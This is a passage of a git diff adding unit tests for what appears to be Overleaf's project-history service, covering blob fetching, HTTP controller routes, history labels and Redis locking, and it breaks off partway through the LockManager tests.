this.HistoryStoreManager.getMostRecentVersion( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match + .instanceOf(Errors.OpsOutOfOrderError) + .and( + sinon.match.has( + 'message', + 'project structure version out of order' + ) + ) + ) + }) + + it('should call the callback with the latest version information', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match.instanceOf(Errors.OpsOutOfOrderError), + 12, + { + project: 3, + docs: { mock_doc_id: { pathname: '/main.tex', v: 2 } }, + }, + this.chunk.chunk.history.changes[6] + ) + }) + }) + + describe('with an unexpected response', function () { + beforeEach(function () { + this.badChunk = { + chunk: { + foo: 123, // valid chunk should have startVersion property + bar: 456, + }, + } + this.request + .withArgs(this.latestChunkRequestArgs) + .yields(null, { statusCode: 200 }, this.badChunk) + this.HistoryStoreManager.getMostRecentVersion( + this.projectId, + this.historyId, + this.callback + ) + }) + + it('should return an error', function () { + expect(this.callback).to.have.been.calledWith( + sinon.match + .instanceOf(Error) + .and(sinon.match.has('message', 'unexpected response')) + ) + }) + }) + }) + + describe('createBlobForUpdate', function () { + beforeEach(function () { + this.fileStream = {} + this.hash = 'random-hash' + this.LocalFileWriter.bufferOnDisk.callsArgWith(4, null, this.hash) + this.FetchUtils.fetchNothing.rejects( + new RequestFailedError('', {}, { status: 404 }) + ) + this.FetchUtils.fetchStream.resolves(this.fileStream) + }) + + describe('for a file update with any filestore location', function () { + beforeEach(function (done) { + this.file_id = '012345678901234567890123' + this.update = { + file: true, + url: `http://filestore.other.cloud.provider/project/${this.projectId}/file/${this.file_id}`, + hash: this.hash, + } + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + (err, { file: hash }) => { + if (err) { + return done(err) + } + this.actualHash = hash + done() + } + ) + }) + + it('should not log any warnings', function () { + expect(this.logger.warn).to.not.have.been.called + }) + + it('should request the file from the filestore in settings', function () { + expect(this.FetchUtils.fetchStream).to.have.been.calledWithMatch( + `${this.settings.apis.filestore.url}/project/${this.projectId}/file/${this.file_id}` + ) + }) + + it('should call the callback with the blob', function () { + expect(this.actualHash).to.equal(this.hash) + }) + }) + + describe('with filestore disabled', function () { + beforeEach(function (done) { + this.settings.apis.filestore.enabled = false + this.file_id = '012345678901234567890123' + this.update = { + file: true, + url: `http://filestore.other.cloud.provider/project/${this.projectId}/file/${this.file_id}`, + hash: this.hash, + } + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + err => { + expect(err).to.match(/blocking filestore read/) + done() + } + ) + }) + it('should not request the file', function () { + expect(this.FetchUtils.fetchStream).to.not.have.been.called + }) + }) + + describe('for a file update with an invalid filestore location', function () { + beforeEach(function (done) { + this.invalid_id = '000000000000000000000000' + this.file_id = '012345678901234567890123' + this.update = { + file: true, + url: `http://filestore.other.cloud.provider/project/${this.invalid_id}/file/${this.file_id}`, + hash: this.hash, + } + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + err => { + expect(err).to.exist + done() + } + ) + }) + + it('should not request the file from the filestore', function () { + expect(this.FetchUtils.fetchStream).to.not.have.been.called + }) + }) + + describe('when the hash mismatches', function () { + beforeEach(function (done) { + this.file_id = '012345678901234567890123' + this.update = { + file: true, + url: `http://filestore.other.cloud.provider/project/${this.projectId}/file/${this.file_id}`, + hash: 'another-hash-from-web', + } + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + (err, { file: hash }) => { + if (err) { + return done(err) + } + this.actualHash = hash + done() + } + ) + }) + + it('should log a warning', function () { + expect(this.logger.warn).to.have.been.calledWith( + { + projectId: this.projectId, + fileId: this.file_id, + webHash: 'another-hash-from-web', + fileHash: this.hash, + }, + 'hash mismatch between web and project-history' + ) + }) + + it('should request the file from the filestore in settings', function () { + expect(this.FetchUtils.fetchStream).to.have.been.calledWithMatch( + `${this.settings.apis.filestore.url}/project/${this.projectId}/file/${this.file_id}` + ) + }) + + it('should call the callback with the blob', function () { + expect(this.actualHash).to.equal(this.hash) + }) + }) + describe('when the createdBlob flag is set on the update', function () { + beforeEach(function () { + this.file_id = '012345678901234567890123' + this.update = { + file: true, + createdBlob: true, + url: `http://filestore.other.cloud.provider/project/${this.projectId}/file/${this.file_id}`, + hash: this.hash, + } + }) + describe('when history-v1 confirms that the blob exists', function () { + beforeEach(function (done) { + this.FetchUtils.fetchNothing.resolves() + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + (err, { file: hash }) => { + if (err) { + return done(err) + } + this.actualHash = hash + done() + } + ) + }) + + it('should call the callback with the existing hash', function () { + expect(this.actualHash).to.equal(this.hash) + }) + + it('should not request the file from the filestore', function () { + expect(this.FetchUtils.fetchStream).to.not.have.been.called + }) + + it('should log a debug level message', function () { + expect(this.logger.debug).to.have.been.calledWith( + { + projectId: this.projectId, + fileId: this.file_id, + update: this.update, + }, + 'Skipping blob creation as it has already been created' + ) + }) + }) + describe('when history-v1 does not confirm that the blob exists', function () { + beforeEach(function (done) { + this.FetchUtils.fetchNothing.rejects( + new RequestFailedError( + `${this.settings.overleaf.history.host}/project/${this.projectId}/file/${this.file_id}`, + { method: 'HEAD' }, + { status: 404 } + ) + ) + this.HistoryStoreManager.createBlobForUpdate( + this.projectId, + this.historyId, + this.update, + (err, { file: hash }) => { + if (err) { + return done(err) + } + this.actualHash = hash + done() + } + ) + }) + + it('should warn that we will use the filestore', function () { + expect(this.logger.warn).to.have.been.calledWithMatch( + { + fileId: this.file_id, + projectId: this.projectId, + update: this.update, + }, + 'created blob does not exist, reading from filestore' + ) + }) + + it('should request the file from the filestore in settings', function () { + expect(this.FetchUtils.fetchStream).to.have.been.calledWithMatch( + `${this.settings.apis.filestore.url}/project/${this.projectId}/file/${this.file_id}` + ) + }) + + it('should call the callback with the blob', function () { + expect(this.actualHash).to.equal(this.hash) + }) + }) + }) + }) + + describe('getProjectBlob', function () { + describe('successfully', function () { + beforeEach(function () { + this.blobContent = 'test content' + this.blobHash = 'test hash' + + this.request.yields(null, { statusCode: 200 }, this.blobContent) + this.HistoryStoreManager.getProjectBlob( + this.historyId, + this.blobHash, + this.callback + ) + }) + + it('should get the blob from the overleaf history service', function () { + expect(this.request).to.have.been.calledWithMatch({ + method: 'GET', + url: `${this.settings.overleaf.history.host}/projects/${this.historyId}/blobs/${this.blobHash}`, + auth: { + user: this.settings.overleaf.history.user, + pass: this.settings.overleaf.history.pass, + sendImmediately: true, + }, + }) + }) + + it('should call the callback with the blob', function () { + expect(this.callback).to.have.been.calledWith(null, this.blobContent) + }) + }) + }) + + describe('getProjectBlobStream', function () { + describe('successfully', function () { + beforeEach(function (done) { + this.historyResponse = new EventEmitter() + this.blobHash = 'test hash' + + this.FetchUtils.fetchStream.resolves(this.historyResponse) + this.HistoryStoreManager.getProjectBlobStream( + this.historyId, + this.blobHash, + (err, stream) => { + if (err) { + return done(err) + } + this.stream = stream + done() + } + ) + }) + + it('should get the blob from the overleaf history service', function () { + expect(this.FetchUtils.fetchStream).to.have.been.calledWithMatch( + `${this.settings.overleaf.history.host}/projects/${this.historyId}/blobs/${this.blobHash}` + ) + }) + + it('should return a stream of the blob contents', function () { + expect(this.stream).to.equal(this.historyResponse) + }) + }) + }) + + describe('initializeProject', function () { + describe('successfully', function () { + beforeEach(function () { + this.response_body = { projectId: this.historyId } + this.request.callsArgWith( + 1, + null, + { statusCode: 200 }, + this.response_body + ) + + this.HistoryStoreManager.initializeProject( + this.historyId, + this.callback + ) + }) + + it('should send the change to the history store', function () { + expect(this.request).to.have.been.calledWithMatch({ + method: 'POST', + url: `${this.settings.overleaf.history.host}/projects`, + auth: { + user: this.settings.overleaf.history.user, + pass: this.settings.overleaf.history.pass, + sendImmediately: true, + }, + json: { projectId: this.historyId }, + }) + }) + + it('should call the callback with the new overleaf id', function () { + expect(this.callback).to.have.been.calledWith(null, this.historyId) + }) + }) + }) + + describe('deleteProject', function () { + beforeEach(function (done) { + this.request.yields(null, { statusCode: 204 }, '') + this.HistoryStoreManager.deleteProject(this.historyId, done) + }) + + it('should ask the history store to delete the project', function () { + expect(this.request).to.have.been.calledWithMatch({ + method: 'DELETE', + url: `${this.settings.overleaf.history.host}/projects/${this.historyId}`, + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/HttpController/HttpControllerTests.js b/services/project-history/test/unit/js/HttpController/HttpControllerTests.js new file mode 100644 index 0000000..1b7adf0 --- /dev/null +++ b/services/project-history/test/unit/js/HttpController/HttpControllerTests.js @@ -0,0 +1,573 @@ +import sinon from 'sinon' +import { strict as esmock } from 'esmock' +import mongodb from 'mongodb-legacy' +const { ObjectId } = mongodb + +const MODULE_PATH = '../../../../app/js/HttpController.js' + +describe('HttpController', function () { + beforeEach(async function () { + this.UpdatesProcessor = { + processUpdatesForProject: sinon.stub().yields(), + } + this.SummarizedUpdatesManager = { + getSummarizedProjectUpdates: sinon.stub(), + } + this.DiffManager = { + getDiff: sinon.stub(), + } + this.HistoryStoreManager = { + deleteProject: sinon.stub().yields(), + getMostRecentVersion: sinon.stub(), + getProjectBlobStream: sinon.stub(), + initializeProject: sinon.stub(), + } + this.SnapshotManager = { + getFileSnapshotStream: sinon.stub(), + getProjectSnapshot: sinon.stub(), + } + this.HealthChecker = {} + this.SyncManager = { + clearResyncState: sinon.stub().yields(), + startResync: sinon.stub().yields(), + } + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.RedisManager = { + destroyDocUpdatesQueue: sinon.stub().yields(), + clearFirstOpTimestamp: sinon.stub().yields(), + clearCachedHistoryId: sinon.stub().yields(), + } + this.ErrorRecorder = { + clearError: sinon.stub().yields(), + } + this.LabelsManager = { + createLabel: sinon.stub(), + deleteLabel: sinon.stub().yields(), + deleteLabelForUser: sinon.stub().yields(), + getLabels: sinon.stub(), + } + this.HistoryApiManager = { + shouldUseProjectHistory: sinon.stub(), + } + this.RetryManager = {} + this.FlushManager = {} + this.request = {} + this.pipeline = sinon.stub() + this.HttpController = await esmock(MODULE_PATH, { + request: this.request, + stream: { pipeline: this.pipeline }, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '../../../../app/js/SummarizedUpdatesManager.js': + this.SummarizedUpdatesManager, + '../../../../app/js/DiffManager.js': this.DiffManager, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/SnapshotManager.js': this.SnapshotManager, + '../../../../app/js/HealthChecker.js': this.HealthChecker, + '../../../../app/js/SyncManager.js': this.SyncManager, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/RedisManager.js': this.RedisManager, + '../../../../app/js/ErrorRecorder.js': this.ErrorRecorder, + '../../../../app/js/LabelsManager.js': this.LabelsManager, + '../../../../app/js/HistoryApiManager.js': this.HistoryApiManager, + '../../../../app/js/RetryManager.js': this.RetryManager, + '../../../../app/js/FlushManager.js': this.FlushManager, + }) + this.pathname = 'doc-id-123' + this.projectId = new ObjectId().toString() + this.projectOwnerId = new ObjectId().toString() + this.next = sinon.stub() + this.userId = new ObjectId().toString() + this.now = Date.now() + this.res = { + json: sinon.stub(), + send: sinon.stub(), + sendStatus: sinon.stub(), + setHeader: sinon.stub(), + } + }) + + describe('getProjectBlob', function () { + beforeEach(function () { + this.blobHash = 'abcd' + this.stream = {} + this.historyId = 1337 + this.HistoryStoreManager.getProjectBlobStream.yields(null, this.stream) + this.HttpController.getProjectBlob( + { params: { history_id: this.historyId, hash: this.blobHash } }, + this.res, + this.next + ) + }) + + it('should get a blob stream', function () { + this.HistoryStoreManager.getProjectBlobStream + .calledWith(this.historyId, this.blobHash) + .should.equal(true) + this.pipeline.should.have.been.calledWith(this.stream, this.res) + }) + + it('should set caching header', function () { + this.res.setHeader.should.have.been.calledWith( + 'Cache-Control', + 'private, max-age=86400' + ) + }) + }) + + describe('initializeProject', function () { + beforeEach(function () { + this.historyId = new ObjectId().toString() + this.req = { body: { historyId: this.historyId } } + this.HistoryStoreManager.initializeProject.yields(null, this.historyId) + this.HttpController.initializeProject(this.req, this.res, this.next) + }) + + it('should initialize the project', function () { + this.HistoryStoreManager.initializeProject.calledWith().should.equal(true) + }) + + it('should return the new overleaf id', function () { + this.res.json + .calledWith({ project: { id: this.historyId } }) + .should.equal(true) + }) + }) + + describe('flushProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + }, + query: {}, + } + this.HttpController.flushProject(this.req, this.res, this.next) + }) + + it('should process the updates', function () { + this.UpdatesProcessor.processUpdatesForProject + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should return a success code', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('getDiff', function () { + beforeEach(function () { + this.from = 42 + this.to = 45 + this.req = { + params: { + project_id: this.projectId, + }, + query: { + pathname: this.pathname, + from: this.from, + to: this.to, + }, + } + this.diff = [{ u: 'mock-diff' }] + this.DiffManager.getDiff.yields(null, this.diff) + this.HttpController.getDiff(this.req, this.res, this.next) + }) + + it('should get the diff', function () { + this.DiffManager.getDiff.should.have.been.calledWith( + this.projectId, + this.pathname, + this.from, + this.to + ) + }) + + it('should return the diff', function () { + this.res.json.calledWith({ diff: this.diff }).should.equal(true) + }) + }) + + describe('getUpdates', function () { + beforeEach(function () { + this.before = Date.now() + this.nextBeforeTimestamp = this.before - 100 + this.min_count = 10 + this.req = { + params: { + project_id: this.projectId, + }, + query: { + before: this.before, + min_count: this.min_count, + }, + } + this.updates = [{ i: 'mock-summarized-updates', p: 10 }] + this.SummarizedUpdatesManager.getSummarizedProjectUpdates.yields( + null, + this.updates, + this.nextBeforeTimestamp + ) + this.HttpController.getUpdates(this.req, this.res, this.next) + }) + + it('should get the updates', function () { + this.SummarizedUpdatesManager.getSummarizedProjectUpdates.should.have.been.calledWith( + this.projectId, + { + before: this.before, + min_count: this.min_count, + } + ) + }) + + it('should return the formatted updates', function () { + this.res.json.should.have.been.calledWith({ + updates: this.updates, + nextBeforeTimestamp: this.nextBeforeTimestamp, + }) + }) + }) + + describe('latestVersion', function () { + beforeEach(function () { + this.historyId = 1234 + this.req = { + params: { + project_id: this.projectId, + }, + } + + this.version = 99 + this.lastChange = { + v2Authors: ['1234'], + timestamp: '2016-08-16T10:44:40.227Z', + } + this.versionInfo = { + version: this.version, + v2Authors: ['1234'], + timestamp: '2016-08-16T10:44:40.227Z', + } + this.WebApiManager.getHistoryId.yields(null, this.historyId) + this.HistoryStoreManager.getMostRecentVersion.yields( + null, + this.version, + {}, + this.lastChange + ) + this.HttpController.latestVersion(this.req, this.res, this.next) + }) + + it('should process the updates', function () { + this.UpdatesProcessor.processUpdatesForProject + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the ol project id', function () { + this.WebApiManager.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the latest version', function () { + this.HistoryStoreManager.getMostRecentVersion + .calledWith(this.projectId, this.historyId) + .should.equal(true) + }) + + it('should return version number', function () { + this.res.json.calledWith(this.versionInfo).should.equal(true) + }) + }) + + describe('resyncProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + }, + query: {}, + body: {}, + } + this.HttpController.resyncProject(this.req, this.res, this.next) + }) + + it('should resync the project', function () { + this.SyncManager.startResync.calledWith(this.projectId).should.equal(true) + }) + + it('should flush the queue', function () { + this.UpdatesProcessor.processUpdatesForProject + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should return 204', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('getFileSnapshot', function () { + beforeEach(function () { + this.version = 42 + this.pathname = 'foo.tex' + this.req = { + params: { + project_id: this.projectId, + version: this.version, + pathname: this.pathname, + }, + } + this.res = { mock: 'res' } + this.stream = {} + this.SnapshotManager.getFileSnapshotStream.yields(null, this.stream) + this.HttpController.getFileSnapshot(this.req, this.res, this.next) + }) + + it('should get the snapshot', function () { + this.SnapshotManager.getFileSnapshotStream.should.have.been.calledWith( + this.projectId, + this.version, + this.pathname + ) + }) + + it('should pipe the returned stream into the response', function () { + this.pipeline.should.have.been.calledWith(this.stream, this.res) + }) + }) + + describe('getProjectSnapshot', function () { + beforeEach(function () { + this.version = 42 + this.req = { + params: { + project_id: this.projectId, + version: this.version, + }, + } + this.res = { json: sinon.stub() } + this.snapshotData = { one: 1 } + this.SnapshotManager.getProjectSnapshot.yields(null, this.snapshotData) + this.HttpController.getProjectSnapshot(this.req, this.res, this.next) + }) + + it('should get the snapshot', function () { + this.SnapshotManager.getProjectSnapshot.should.have.been.calledWith( + this.projectId, + this.version + ) + }) + + it('should send json response', function () { + this.res.json.calledWith(this.snapshotData).should.equal(true) + }) + }) + + describe('getLabels', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + }, + } + this.labels = ['label-1', 'label-2'] + this.LabelsManager.getLabels.yields(null, this.labels) + }) + + describe('project history is enabled', function () { + beforeEach(function () { + this.HistoryApiManager.shouldUseProjectHistory.yields(null, true) + this.HttpController.getLabels(this.req, this.res, this.next) + }) + + it('should get the labels for a project', function () { + this.LabelsManager.getLabels + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should return the labels', function () { + this.res.json.calledWith(this.labels).should.equal(true) + }) + }) + + describe('project history is not enabled', function () { + beforeEach(function () { + this.HistoryApiManager.shouldUseProjectHistory.yields(null, false) + this.HttpController.getLabels(this.req, this.res, this.next) + }) + + it('should return 409', function () { + this.res.sendStatus.calledWith(409).should.equal(true) + }) + }) + }) + + describe('createLabel', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + }, + body: { + version: (this.version = 'label-1'), + comment: (this.comment = 'a comment'), + created_at: (this.created_at = Date.now().toString()), + validate_exists: true, + user_id: this.userId, + }, + } + this.label = { _id: new ObjectId() } + this.LabelsManager.createLabel.yields(null, this.label) + }) + + describe('project history is enabled', function () { + beforeEach(function () { + this.HistoryApiManager.shouldUseProjectHistory.yields(null, true) + this.HttpController.createLabel(this.req, this.res, this.next) + }) + + it('should create a label for a project', function () { + this.LabelsManager.createLabel.should.have.been.calledWith( + this.projectId, + this.userId, + this.version, + this.comment, + this.created_at, + true + ) + }) + + it('should return the label', function () { + this.res.json.calledWith(this.label).should.equal(true) + }) + }) + + describe('validate_exists = false is passed', function () { + beforeEach(function () { + this.req.body.validate_exists = false + this.HistoryApiManager.shouldUseProjectHistory.yields(null, true) + this.HttpController.createLabel(this.req, this.res, this.next) + }) + + it('should create a label for a project', function () { + this.LabelsManager.createLabel + .calledWith( + this.projectId, + this.userId, + this.version, + this.comment, + this.created_at, + false + ) + .should.equal(true) + }) + + it('should return the label', function () { + this.res.json.calledWith(this.label).should.equal(true) + }) + }) + + describe('project history is not enabled', function () { + beforeEach(function () { + this.HistoryApiManager.shouldUseProjectHistory.yields(null, false) + this.HttpController.createLabel(this.req, this.res, this.next) + }) + + it('should return 409', function () { + this.res.sendStatus.calledWith(409).should.equal(true) + }) + }) + }) + + describe('deleteLabelForUser', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + user_id: this.userId, + label_id: (this.label_id = new ObjectId()), + }, + } + this.HttpController.deleteLabelForUser(this.req, this.res, this.next) + }) + + it('should delete a label for a project', function () { + this.LabelsManager.deleteLabelForUser + .calledWith(this.projectId, this.userId, this.label_id) + .should.equal(true) + }) + + it('should return 204', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('deleteLabel', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + label_id: (this.label_id = new ObjectId()), + }, + } + this.HttpController.deleteLabel(this.req, this.res, this.next) + }) + + it('should delete a label for a project', function () { + this.LabelsManager.deleteLabel + .calledWith(this.projectId, this.label_id) + .should.equal(true) + }) + + it('should return 204', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('deleteProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.projectId, + }, + } + this.WebApiManager.getHistoryId + .withArgs(this.projectId) + .yields(null, this.historyId) + this.HttpController.deleteProject(this.req, this.res, this.next) + }) + + it('should delete the updates queue', function () { + this.RedisManager.destroyDocUpdatesQueue.should.have.been.calledWith( + this.projectId + ) + }) + + it('should clear the first op timestamp', function () { + this.RedisManager.clearFirstOpTimestamp.should.have.been.calledWith( + this.projectId + ) + }) + + it('should clear the cached history id', function () { + this.RedisManager.clearCachedHistoryId.should.have.been.calledWith( + this.projectId + ) + }) + + it('should clear the resync state', function () { + this.SyncManager.clearResyncState.should.have.been.calledWith( + this.projectId + ) + }) + + it('should clear any failure record', function () { + this.ErrorRecorder.clearError.should.have.been.calledWith(this.projectId) + }) + }) +}) diff --git a/services/project-history/test/unit/js/LabelsManager/LabelsManagerTests.js b/services/project-history/test/unit/js/LabelsManager/LabelsManagerTests.js new file mode 100644 index 0000000..3916f45 --- /dev/null +++ b/services/project-history/test/unit/js/LabelsManager/LabelsManagerTests.js @@ -0,0 +1,293 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import tk from 'timekeeper' +import { strict as esmock } from 'esmock' +const { ObjectId } = mongodb + +const MODULE_PATH = '../../../../app/js/LabelsManager.js' + +describe('LabelsManager', function () { + beforeEach(async function () { + this.now = new Date() + tk.freeze(this.now) + this.db = { + projectHistoryLabels: { + deleteOne: sinon.stub(), + find: sinon.stub(), + insertOne: sinon.stub(), + }, + } + this.mongodb = { + ObjectId, + db: this.db, + } + this.HistoryStoreManager = { + getChunkAtVersion: sinon.stub().yields(), + } + this.UpdatesProcessor = { + processUpdatesForProject: sinon.stub().yields(), + } + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.LabelsManager = await esmock(MODULE_PATH, { + '../../../../app/js/mongodb.js': this.mongodb, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + }) + + this.project_id = new ObjectId().toString() + this.historyId = 123 + this.user_id = new ObjectId().toString() + this.label_id = new ObjectId().toString() + this.callback = sinon.stub() + }) + + afterEach(function () { + tk.reset() + }) + + describe('getLabels', function () { + beforeEach(function () { + this.label = { + _id: new ObjectId(), + comment: 'some comment', + version: 123, + user_id: new ObjectId(), + created_at: new Date(), + } + + this.db.projectHistoryLabels.find.returns({ + toArray: sinon.stub().yields(null, [this.label]), + }) + }) + + describe('with valid project id', function () { + beforeEach(function () { + this.LabelsManager.getLabels(this.project_id, this.callback) + }) + + it('gets the labels state from mongo', function () { + expect(this.db.projectHistoryLabels.find).to.have.been.calledWith({ + project_id: new ObjectId(this.project_id), + }) + }) + + it('returns formatted labels', function () { + expect(this.callback).to.have.been.calledWith(null, [ + sinon.match({ + id: this.label._id, + comment: this.label.comment, + version: this.label.version, + user_id: this.label.user_id, + created_at: this.label.created_at, + }), + ]) + }) + }) + + describe('with invalid project id', function () { + it('returns an error', function (done) { + this.LabelsManager.getLabels('invalid id', error => { + expect(error).to.exist + done() + }) + }) + }) + }) + + describe('createLabel', function () { + beforeEach(function () { + this.version = 123 + this.comment = 'a comment' + this.WebApiManager.getHistoryId.yields(null, this.historyId) + }) + + describe('with createdAt', function () { + beforeEach(function () { + this.createdAt = new Date(1) + this.db.projectHistoryLabels.insertOne.yields(null, { + insertedId: new ObjectId(this.label_id), + }) + this.LabelsManager.createLabel( + this.project_id, + this.user_id, + this.version, + this.comment, + this.createdAt, + true, + this.callback + ) + }) + + it('flushes unprocessed updates', function () { + expect( + this.UpdatesProcessor.processUpdatesForProject + ).to.have.been.calledWith(this.project_id) + }) + + it('finds the V1 project id', function () { + expect(this.WebApiManager.getHistoryId).to.have.been.calledWith( + this.project_id + ) + }) + + it('checks there is a chunk for the project + version', function () { + expect( + this.HistoryStoreManager.getChunkAtVersion + ).to.have.been.calledWith(this.project_id, this.historyId, this.version) + }) + + it('create the label in mongo', function () { + expect(this.db.projectHistoryLabels.insertOne).to.have.been.calledWith( + sinon.match({ + project_id: new ObjectId(this.project_id), + comment: this.comment, + version: this.version, + user_id: new ObjectId(this.user_id), + created_at: this.createdAt, + }), + sinon.match.any + ) + }) + + it('returns the label', function () { + expect(this.callback).to.have.been.calledWith(null, { + id: new ObjectId(this.label_id), + comment: this.comment, + version: this.version, + user_id: new ObjectId(this.user_id), + created_at: this.createdAt, + }) + }) + }) + + describe('without createdAt', function () { + beforeEach(function () { + this.db.projectHistoryLabels.insertOne.yields(null, { + insertedId: new ObjectId(this.label_id), + }) + this.LabelsManager.createLabel( + this.project_id, + this.user_id, + this.version, + this.comment, + undefined, + true, + this.callback + ) + }) + + it('create the label with the current date', function () { + expect(this.db.projectHistoryLabels.insertOne).to.have.been.calledWith( + sinon.match({ + project_id: new ObjectId(this.project_id), + comment: this.comment, + version: this.version, + user_id: new ObjectId(this.user_id), + created_at: this.now, + }) + ) + }) + }) + + describe('with shouldValidateExists = false', function () { + beforeEach(function () { + this.createdAt = new Date(1) + this.db.projectHistoryLabels.insertOne.yields(null, { + insertedId: new ObjectId(this.label_id), + }) + this.LabelsManager.createLabel( + this.project_id, + this.user_id, + this.version, + this.comment, + this.createdAt, + false, + this.callback + ) + }) + + it('checks there is a chunk for the project + version', function () { + expect(this.HistoryStoreManager.getChunkAtVersion).to.not.have.been + .called + }) + }) + + describe('with no userId', function () { + beforeEach(function () { + this.db.projectHistoryLabels.insertOne.yields(null, { + insertedId: new ObjectId(this.label_id), + }) + const userId = undefined + this.LabelsManager.createLabel( + this.project_id, + userId, + this.version, + this.comment, + this.createdAt, + false, + this.callback + ) + }) + + it('creates the label without user_id', function () { + expect(this.db.projectHistoryLabels.insertOne).to.have.been.calledWith( + sinon.match({ + project_id: new ObjectId(this.project_id), + comment: this.comment, + version: this.version, + user_id: undefined, + created_at: this.now, + }) + ) + }) + }) + }) + + describe('deleteLabelForUser', function () { + beforeEach(function () { + this.db.projectHistoryLabels.deleteOne.yields() + this.LabelsManager.deleteLabelForUser( + this.project_id, + this.user_id, + this.label_id, + this.callback + ) + }) + + it('removes the label from the database', function () { + expect(this.db.projectHistoryLabels.deleteOne).to.have.been.calledWith( + { + _id: new ObjectId(this.label_id), + project_id: new ObjectId(this.project_id), + user_id: new ObjectId(this.user_id), + }, + this.callback + ) + }) + }) + + describe('deleteLabel', function () { + beforeEach(function () { + this.db.projectHistoryLabels.deleteOne.yields() + this.LabelsManager.deleteLabel( + this.project_id, + this.label_id, + this.callback + ) + }) + + it('removes the label from the database', function () { + expect(this.db.projectHistoryLabels.deleteOne).to.have.been.calledWith( + { + _id: new ObjectId(this.label_id), + project_id: new ObjectId(this.project_id), + }, + this.callback + ) + }) + }) +}) diff --git a/services/project-history/test/unit/js/LockManager/LockManagerTests.js b/services/project-history/test/unit/js/LockManager/LockManagerTests.js new file mode 100644 index 0000000..277af1b --- /dev/null +++ b/services/project-history/test/unit/js/LockManager/LockManagerTests.js @@ -0,0 +1,422 @@ +/* eslint-disable + mocha/no-nested-tests, + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import async from 'async' +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/LockManager.js' + +describe('LockManager', function () { + beforeEach(async function () { + let Timer + this.Settings = { + redis: { + lock: {}, + }, + } + this.rclient = { + auth: sinon.stub(), + del: sinon.stub().yields(), + eval: sinon.stub(), + exists: sinon.stub(), + set: sinon.stub(), + } + this.RedisWrapper = { + createClient: sinon.stub().returns(this.rclient), + } + this.Metrics = { + inc: sinon.stub(), + gauge: sinon.stub(), + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + } + this.logger = { + debug: sinon.stub(), + } + this.LockManager = await esmock(MODULE_PATH, { + '@overleaf/redis-wrapper': this.RedisWrapper, + '@overleaf/settings': this.Settings, + '@overleaf/metrics': this.Metrics, + '@overleaf/logger': this.logger, + }) + + this.key = 'lock-key' + this.callback = sinon.stub() + this.clock = sinon.useFakeTimers() + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('checkLock', function () { + describe('when the lock is taken', function () { + beforeEach(function () { + this.rclient.exists.yields(null, '1') + return this.LockManager.checkLock(this.key, this.callback) + }) + + it('should check the lock in redis', function () { + return this.rclient.exists.calledWith(this.key).should.equal(true) + }) + + return it('should return the callback with false', function () { + return this.callback.calledWith(null, false).should.equal(true) + }) + }) + + return describe('when the lock is free', function () { + beforeEach(function () { + this.rclient.exists.yields(null, '0') + return this.LockManager.checkLock(this.key, this.callback) + }) + + return it('should return the callback with true', function () { + return this.callback.calledWith(null, true).should.equal(true) + }) + }) + }) + + describe('tryLock', function () { + describe('when the lock is taken', function () { + beforeEach(function () { + this.rclient.set.yields(null, null) + this.LockManager._mocks.randomLock = sinon + .stub() + .returns('locked-random-value') + return this.LockManager.tryLock(this.key, this.callback) + }) + + it('should check the lock in redis', function () { + return this.rclient.set.should.have.been.calledWith( + this.key, + 'locked-random-value', + 'EX', + this.LockManager.LOCK_TTL, + 'NX' + ) + }) + + return it('should return the callback with false', function () { + return this.callback.calledWith(null, false).should.equal(true) + }) + }) + + return describe('when the lock is free', function () { + beforeEach(function () { + this.rclient.set.yields(null, 'OK') + return this.LockManager.tryLock(this.key, this.callback) + }) + + return it('should return the callback with true', function () { + return this.callback.calledWith(null, 